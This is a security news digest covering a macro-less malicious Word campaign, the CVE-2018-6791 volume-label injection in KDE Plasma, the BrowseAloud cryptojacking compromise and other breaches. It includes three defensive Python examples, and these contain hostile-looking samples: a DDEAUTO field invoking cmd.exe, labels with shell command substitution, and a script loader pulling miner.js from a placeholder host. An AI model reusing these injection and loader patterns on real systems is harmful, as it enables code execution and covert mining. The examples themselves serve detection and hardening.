Typically, email-borne attacks that carry malicious Microsoft Office attachments require the adversary to trick the user into enabling macros. But researchers say they have identified a new malicious email campaign whose booby-trapped Office attachments use no macros at all.
Because no macro is involved, the attachments do not trigger the security warning that Office displays for macro-enabled documents, according to research published Wednesday by Trustwave’s SpiderLabs. When the attachment is opened there are no warnings or pop-ups to alert the victim, the researchers said. The campaign uses malicious Word attachments.
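As an added illustration (not code from the Trustwave research), the following Python script performs a first-pass triage of a Word attachment without opening it in Office: it unpacks the OOXML zip and reports whether the document carries a VBA project (macros), embedded OLE objects, DDE fields, or an external attached-template relationship, which are the usual ways a document runs code with or without a macro. The sample packages, their contents and the `needs_sandbox` helper are constructed for the example; the article does not say which mechanism this particular campaign used.

```python
import io
import re
import zipfile

# Relationship type Word uses for an attached (possibly remote) template.
ATTACHED_TEMPLATE = "relationships/attachedTemplate"
# DDE / DDEAUTO field codes in document XML.
DDE_FIELD = re.compile(rb"\bDDE(AUTO)?\b")


def build_docx(parts):
    """Assemble a minimal OOXML package (a zip) in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


def triage_office_attachment(blob):
    """Report the code-bearing parts of a Word package: a VBA project,
    embedded OLE objects, DDE fields and external template relationships.
    Pure zip/regex inspection; nothing is handed to Office."""
    findings = {"macros": False, "embedded_objects": [],
                "dde_fields": False, "external_template": False}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                findings["macros"] = True
            elif "/embeddings/" in lower:
                findings["embedded_objects"].append(name)
            elif lower.endswith(".rels"):
                data = z.read(name).decode("utf-8", "replace")
                for rel in re.findall(r"<Relationship\b[^>]*/>", data):
                    if ATTACHED_TEMPLATE in rel and 'TargetMode="External"' in rel:
                        findings["external_template"] = True
            elif lower.endswith(".xml") and DDE_FIELD.search(z.read(name)):
                findings["dde_fields"] = True
    return findings


def needs_sandbox(findings):
    """True when any active-content mechanism is present (hypothetical policy hook)."""
    return (findings["macros"] or bool(findings["embedded_objects"])
            or findings["dde_fields"] or findings["external_template"])


# Constructed samples (not real malware): the package skeleton is the same,
# only the code-bearing part differs between them.
BODY = b"<w:document><w:body><w:p><w:r><w:t>Invoice attached</w:t></w:r></w:p></w:body></w:document>"
SAMPLES = {
    "plain": build_docx({"word/document.xml": BODY}),
    "macro": build_docx({"word/document.xml": BODY,
                         "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 fake VBA project"}),
    "ole": build_docx({"word/document.xml": BODY,
                       "word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0 fake OLE object"}),
    "dde": build_docx({"word/document.xml":
                       b'<w:document><w:body><w:p><w:fldSimple w:instr="DDEAUTO c:\\\\Windows\\\\System32\\\\cmd.exe"/></w:p></w:body></w:document>'}),
    "template": build_docx({"word/document.xml": BODY,
                            "word/_rels/settings.xml.rels":
                            b'<Relationships><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://example.invalid/t.dotm" TargetMode="External"/></Relationships>'}),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        f = triage_office_attachment(blob)
        print(f"{label:9s} sandbox={needs_sandbox(f)} {f}")
```

Only the `macro` sample would make Office show its macro warning; the `ole`, `dde` and `template` samples all pass a macro-only filter, which is the gap the campaign exploits. A check like this belongs at the mail gateway, ahead of any user decision.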
FedEx exposed personal information belonging to thousands of its customers after a legacy Amazon S3 storage bucket was left publicly readable, with no authentication required to access it. The discovery was made by security researchers at the Kromtech Security Center, which posted details of the exposure. The data was secured on Tuesday after efforts were made to contact FedEx.
The bucket belonged to Bongo International, a company that helped US retailers sell to consumers around the world by handling shipping and duty calculations and currency conversions, among other things.
A security flaw in Skype's updater can allow an attacker to gain SYSTEM-level privileges on a vulnerable computer. If exploited, the bug elevates a local, unprivileged user to full SYSTEM rights, granting access to every corner of the operating system.
But Microsoft, which owns the voice- and video-calling service, said it won't immediately fix the flaw, because doing so would require too much rework of the installer. Stefan Kanthak found that the Skype update installer could be exploited through DLL hijacking, a technique in which an application that loads a library by name is tricked into loading an attacker-supplied DLL from a directory the attacker can write to and that is searched before the legitimate library's location.
In the past few weeks, the entire information security industry has grown very anxious about Meltdown and Spectre, two classes of vulnerabilities in the way many modern processors implement a performance technique called speculative execution; exploiting them lets an attacker read data that should be inaccessible.
While numerous platforms have rushed to roll out patches, and Meltdown, unlike Spectre, can be mitigated with operating-system patches, it’s still unclear just how badly this situation could go. Unfortunately, researchers are already devising exploits for these vulnerabilities that go beyond the proof-of-concept stage.
Western Union has confirmed that one of its IT suppliers was hacked and that customer information was exposed to the attackers.
A reader, who wished to remain anonymous, showed us a copy of a letter dated January 31 that he received from the money-transfer outfit. The missive admitted that a supposedly secure data storage company used by Western Union was compromised: a database full of the wire-transfer giant's customer records was vulnerable to plundering, and hackers were quick to oblige. In other words, it sounds as though a cloud-based or off-site backup storage provider was hacked. Now that system has been shut down, the cops alerted, and digital forensics teams are probing the network intrusion.
Attackers have been exploiting a zero-day flaw in the Telegram Messenger desktop app to mine cryptocurrency or to install a backdoor that gives them remote control of victims’ computers. Kaspersky Lab discovered in-the-wild attacks on Telegram Messenger’s Windows desktop client in October 2017.
The vulnerability in the popular messaging app had been actively exploited since March 2017 to mine a variety of cryptocurrencies, including Monero, Zcash and Fantomcoin. Yet the multi-purpose malware being delivered could do more than secretly use the computing power of victims’ machines to mine cryptocurrency.
Smartphone users are just as vulnerable to cryptocurrency mining hijacks as their PC counterparts, and sometimes on a dramatic scale.
Malwarebytes has detailed a "drive-by" mining campaign that redirected millions of Android users to a website that hijacked their phones' processors to mine Monero. While the exact trigger wasn't clear, researchers believed that apps carrying malicious ads steered people to the pages. And it wasn't subtle: the site claimed the visitor was showing "suspicious" web activity and said it would keep mining until a CAPTCHA was entered.
A recent Wired profile details the lengths to which Facebook employees are willing to go to ensure the company isn’t monitoring their communications.
The piece examines two years of Facebook’s struggles, detailing everything from its Trending Topics debacle, to the dismissal, acceptance, and regret surrounding the hijacking of the 2016 US Presidential Election by Russian operatives. From its beleaguered CEO, to the increasingly paranoid people manning its workstations, one thing is clear: there’s trouble in Menlo Park. What struck me immediately was the lengths some employees felt were necessary to obscure private information, such as location data, from their employer.
Linux users running the KDE Plasma desktop environment need to apply patches for a bug that can lead to malicious code execution every time a user mounts a USB thumb drive on their computer.
The KDE Plasma team has released versions 5.8.9 and 5.12.0 to address the issue, tracked as CVE-2018-6791 and categorized as an "arbitrary command execution" vulnerability. According to the bug's description, if a USB thumb drive's volume label contains text wrapped in backticks (`...`) or in $(...), that text is executed as a shell command when the drive is mounted through the device notifier. This means an attacker can plant malicious commands simply by choosing the drive's name.
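An added example, not KDE's code or its patch, showing the bug class in Python under a POSIX shell: an untrusted volume label is interpolated into a command string that `/bin/sh` then parses, so `$(...)` and backticks inside the label run as commands. The labels, the `notify_*` functions and the `label_looks_malicious` pre-check are constructed for this illustration; the two hardened variants show the general remedies, quoting the value or never passing it through a shell.

```python
import re
import shlex
import subprocess

# Constructed labels an attacker could write to a thumb drive's filesystem.
# Both payloads are harmless here: they only echo a marker string.
LABELS = {
    "benign": "HOLIDAY_PHOTOS",
    "subshell": "Backup $(echo INJECTED)",
    "backtick": "Backup `echo INJECTED`",
}

# Shell command-substitution syntax: a backtick or "$(".
SHELL_EXPANSION = re.compile(r"`|\$\(")


def label_looks_malicious(label):
    """Cheap pre-mount check: does the label carry command-substitution syntax?"""
    return bool(SHELL_EXPANSION.search(label))


def notify_vulnerable(label):
    """The pattern behind CVE-2018-6791: the untrusted label is interpolated
    into a command string that a shell parses, so `...` and $(...) in it
    are executed as commands before echo ever sees the text."""
    cmd = f"echo Mounted {label}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def notify_quoted(label):
    """Fix 1: quote the label so the shell treats it as one literal word."""
    cmd = f"echo Mounted {shlex.quote(label)}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def notify_no_shell(label):
    """Fix 2 (preferred): no shell at all; the label is a single argv element
    and nothing ever interprets it."""
    return subprocess.run(["echo", "Mounted", label], capture_output=True,
                          text=True).stdout.strip()


if __name__ == "__main__":
    for name, label in LABELS.items():
        print(f"{name:9s} suspicious={label_looks_malicious(label)}")
        print("  vulnerable:", notify_vulnerable(label))
        print("  quoted:    ", notify_quoted(label))
        print("  no shell:  ", notify_no_shell(label))
```

Run it and the vulnerable variant prints "Mounted Backup INJECTED" for both crafted labels, while the quoted and shell-free variants print the label verbatim. The pre-check is a useful detection signal but not a fix: filesystem labels can carry other shell metacharacters, so the code that consumes them has to stop treating them as shell syntax.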
Thousands of websites, including those of NHS services, the Student Loans Company and several English councils, have been infected with malware that makes visitors’ computers mine cryptocurrency while they use the site.
Late on Sunday, the website of the UK’s data protection watchdog, the Information Commissioner’s Office, was taken down to deal with the issue after it was reportedly infected. The cryptojacking script was injected into the sites’ pages through BrowseAloud, a popular third-party plugin that helps blind and partially sighted people access the web: compromising that one vendor-hosted script placed the miner on more than 5,000 websites at once.
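The BrowseAloud incident is a third-party script supply-chain compromise: every page that included the vendor's script ran whatever the vendor's server delivered. Subresource Integrity (SRI) is not mentioned in the article, but it is the browser-side check for exactly this case, and the following Python, added here as an illustration rather than code from the incident, shows how the `integrity` value is computed, what the browser verifies before executing the script, and why a tampered copy fails. The two script bodies and the hostnames (`vendor.invalid`, `cdn.invalid`) are constructed placeholders.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for a third-party accessibility script, plus the same
# file with a loader appended, as an attacker who controls the vendor's
# hosting could ship it.  Neither is real code from the incident.
VENDOR_SCRIPT = b"(function(){window.readAloud=function(t){console.log(t)};})();\n"
TAMPERED_SCRIPT = VENDOR_SCRIPT + (
    b"var s=document.createElement('script');"
    b"s.src='https://cdn.invalid/miner.js';document.head.appendChild(s);\n"
)


def sri_hash(content, algo="sha384"):
    """Build the value of a <script integrity="..."> attribute: the algorithm
    name, a dash, and the base64-encoded digest of the exact bytes served."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content, integrity):
    """What the browser does before executing a script that carries an
    integrity attribute: recompute the digest of the fetched bytes and
    compare it to the declared value.  On mismatch the script is not run."""
    algo, _, _ = integrity.partition("-")
    return hmac.compare_digest(sri_hash(content, algo), integrity)


def script_tag(src, content):
    """Emit the tag a site embeds for a pinned third-party script.
    crossorigin is required for SRI to apply to a cross-origin resource."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_hash(VENDOR_SCRIPT)
    print(script_tag("https://vendor.invalid/plugin.js", VENDOR_SCRIPT))
    print("vendor copy accepted:  ", sri_matches(VENDOR_SCRIPT, pinned))
    print("tampered copy accepted:", sri_matches(TAMPERED_SCRIPT, pinned))
```

SRI pins one exact version, so a vendor script that updates itself in place stops loading until the site re-pins the hash; that is the intended trade-off, because from the browser's point of view a silent update and a compromise look the same. A Content-Security-Policy `script-src` directive that lists only approved hosts can additionally block the injected loader's second-stage fetch from an unlisted origin.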